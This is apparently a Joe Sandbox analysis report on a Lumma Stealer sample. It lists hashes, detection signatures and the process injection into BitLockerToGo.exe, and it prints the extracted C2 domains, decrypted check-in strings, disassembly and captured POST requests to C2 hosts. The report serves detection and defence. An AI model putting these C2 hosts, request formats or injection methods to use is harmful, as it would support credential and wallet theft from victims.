Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BW4pTs1x3V.exe

Overview

General Information

Sample name:BW4pTs1x3V.exe
renamed because original name is a hash value
Original sample name:2fad7f1752f7c3f57c038bf09359093471523172c08572117eaba2556e859509.exe
Analysis ID:1524036
MD5:3677ebc159e92251f19020e9ab4b62ad
SHA1:561483bb3f3ae9d384d21670f184a7c3fc9cf9c5
SHA256:2fad7f1752f7c3f57c038bf09359093471523172c08572117eaba2556e859509
Tags:exeGuizhouSixuandaTechnologyCoLtduser-JAMESWT_MHT
Infos:

Detection

LummaC, Go Injector, LummaC Stealer
Score:93
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Go Injector
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • BW4pTs1x3V.exe (PID: 1668 cmdline: "C:\Users\user\Desktop\BW4pTs1x3V.exe" MD5: 3677EBC159E92251F19020E9AB4B62AD)
    • BitLockerToGo.exe (PID: 6736 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["fragnantbui.shop", "gutterydhowi.shop", "vozmeatillu.shop", "dividenntykw.shop", "drawzhotdog.shop", "offensivedzvju.shop", "reinforcenh.shop", "stogeneratmns.shop", "ghostreedmnu.shop"], "Build id": "c2CoW0--advert22"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
BW4pTs1x3V.exeJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1885915924.000000C000506000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
    • 0x0:$x1: 4d5a9000030000000
    00000000.00000002.1887668238.00007FF67D7C0000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
      00000000.00000000.1452154530.00007FF67D7C0000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
        Process Memory Space: BW4pTs1x3V.exe PID: 1668JoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.BW4pTs1x3V.exe.7ff67ce60000.0.unpackJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
              0.2.BW4pTs1x3V.exe.7ff67ce60000.7.unpackJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T14:55:29.335432+020020546531A Network Trojan was detected192.168.2.849716172.67.188.210443TCP
                2024-10-02T14:55:32.267885+020020546531A Network Trojan was detected192.168.2.849718172.67.209.193443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T14:55:29.335432+020020498361A Network Trojan was detected192.168.2.849716172.67.188.210443TCP
                2024-10-02T14:55:32.267885+020020498361A Network Trojan was detected192.168.2.849718172.67.209.193443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T14:55:29.551416+020020561561Domain Observed Used for C2 Detected192.168.2.8603531.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T14:55:29.563128+020020561541Domain Observed Used for C2 Detected192.168.2.8541801.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T14:55:29.371418+020020561621Domain Observed Used for C2 Detected192.168.2.8493641.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T14:55:29.359107+020020561641Domain Observed Used for C2 Detected192.168.2.8576931.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T14:55:29.383142+020020561601Domain Observed Used for C2 Detected192.168.2.8597591.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T14:55:29.584440+020020561501Domain Observed Used for C2 Detected192.168.2.8644981.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T14:55:29.573766+020020561521Domain Observed Used for C2 Detected192.168.2.8638061.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T14:55:29.464436+020020561581Domain Observed Used for C2 Detected192.168.2.8596231.1.1.153UDP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
                Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
                Found malware configuration
                Source: 3.2.BitLockerToGo.exe.2cd0000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["fragnantbui.shop", "gutterydhowi.shop", "vozmeatillu.shop", "dividenntykw.shop", "drawzhotdog.shop", "offensivedzvju.shop", "reinforcenh.shop", "stogeneratmns.shop", "ghostreedmnu.shop"], "Build id": "c2CoW0--advert22"}
                Multi AV Scanner detection for submitted file
                Source: BW4pTs1x3V.exeReversingLabs: Detection: 60%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
                Sample uses string decryption to hide its real strings
                Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmpString decryptor: reinforcenh.shop
                Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmpString decryptor: stogeneratmns.shop
                Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmpString decryptor: fragnantbui.shop
                Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmpString decryptor: drawzhotdog.shop
                Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmpString decryptor: vozmeatillu.shop
                Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmpString decryptor: offensivedzvju.shop
                Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmpString decryptor: ghostreedmnu.shop
                Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmpString decryptor: gutterydhowi.shop
                Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmpString decryptor: dividenntykw.shop
                Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmpString decryptor: c2CoW0--advert22
                Source: BW4pTs1x3V.exeStatic PE information: certificate valid
                Source: unknownHTTPS traffic detected: 172.67.188.210:443 -> 192.168.2.8:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.209.193:443 -> 192.168.2.8:49718 version: TLS 1.2
                Source: BW4pTs1x3V.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: BitLockerToGo.pdb source: BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C000760000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C00079A000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000003.1875683062.0000023FE0C20000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000002.1886207178.000000C00080E000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: BitLockerToGo.pdbGCTL source: BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C000760000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C00079A000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000003.1875683062.0000023FE0C20000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000002.1886207178.000000C00080E000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h3_2_02D15EB1
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx3_2_02D15EB1
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_02CDCF00
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push 00000000h3_2_02CF02C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], dx3_2_02CF02C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ebx], ax3_2_02CF02C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_02CF1280
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_02CF1280
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh3_2_02D17210
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 3BABA5E0h3_2_02D13230
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi]3_2_02CE20AC
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_02D19060
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, eax3_2_02CD1000
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, ebx3_2_02CD1000
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0716B6A2h3_2_02D0E000
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 7D006057h3_2_02D0E000
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi]3_2_02CE301B
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edx], 0000h3_2_02CE51BD
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_02D00140
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, eax3_2_02CDA110
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebp, eax3_2_02CDA110
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h3_2_02D19650
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]3_2_02D10670
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h3_2_02CF6630
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esi+edi]3_2_02CDC7C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h3_2_02D197E0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_02D16720
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax3_2_02D16720
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+00000188h]3_2_02D014D0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_02CFE457
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax3_2_02D0E449
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h3_2_02D0E449
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push eax3_2_02CE4471
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then xor eax, eax3_2_02CE4471
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_02D1640A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+00000520h]3_2_02D03430
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_02D03430
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]3_2_02D17430
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]3_2_02D13430
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then inc esi3_2_02CD6420
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi]3_2_02CE2431
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp], 00000000h3_2_02CEA590
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h3_2_02D0EA50
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]3_2_02D01A32
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+68h]3_2_02D01A32
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_02D01A32
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movsx esi, bl3_2_02CDCA20
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_02CFFA20
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add eax, edi3_2_02CF8BC3
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_02CECBE0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_02CF8BE0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_02CF8BE0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx3_2_02D188F6
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_02CF88F0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_02CF88F0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_02CF6890
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]3_2_02CDD860
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_02D019D9
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_02D039C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_02D039C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_02D039C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+68h]3_2_02D039C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_02D02994
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_02D02994
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_02D02994
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+68h]3_2_02D02994
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]3_2_02CD59A0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah3_2_02D19960
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]3_2_02CD4970
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx3_2_02D15EC4
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [02D21244h]3_2_02CFDE01
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh3_2_02D13E30
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_02D12F90
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h3_2_02CECFA0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_02CF7FA0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_02CF7FA0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ebp+edx*4+00h], ax3_2_02CDBCD0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, ecx3_2_02CE4CF8
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then xor eax, eax3_2_02CFADC0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ebp+ebx+00h], 00000000h3_2_02CFCD80
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [esi], ax3_2_02CEEDAD
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_02D09D50
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh3_2_02D12D50
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh3_2_02D17D00

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.8:60353 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.8:59623 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.8:59759 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.8:57693 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.8:63806 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.8:49364 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.8:64498 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.8:54180 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49718 -> 172.67.209.193:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49716 -> 172.67.188.210:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49718 -> 172.67.209.193:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49716 -> 172.67.188.210:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: fragnantbui.shop
                Source: Malware configuration extractorURLs: gutterydhowi.shop
                Source: Malware configuration extractorURLs: vozmeatillu.shop
                Source: Malware configuration extractorURLs: dividenntykw.shop
                Source: Malware configuration extractorURLs: drawzhotdog.shop
                Source: Malware configuration extractorURLs: offensivedzvju.shop
                Source: Malware configuration extractorURLs: reinforcenh.shop
                Source: Malware configuration extractorURLs: stogeneratmns.shop
                Source: Malware configuration extractorURLs: ghostreedmnu.shop
                Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: dividenntykw.shop
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gravvitywio.store
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net 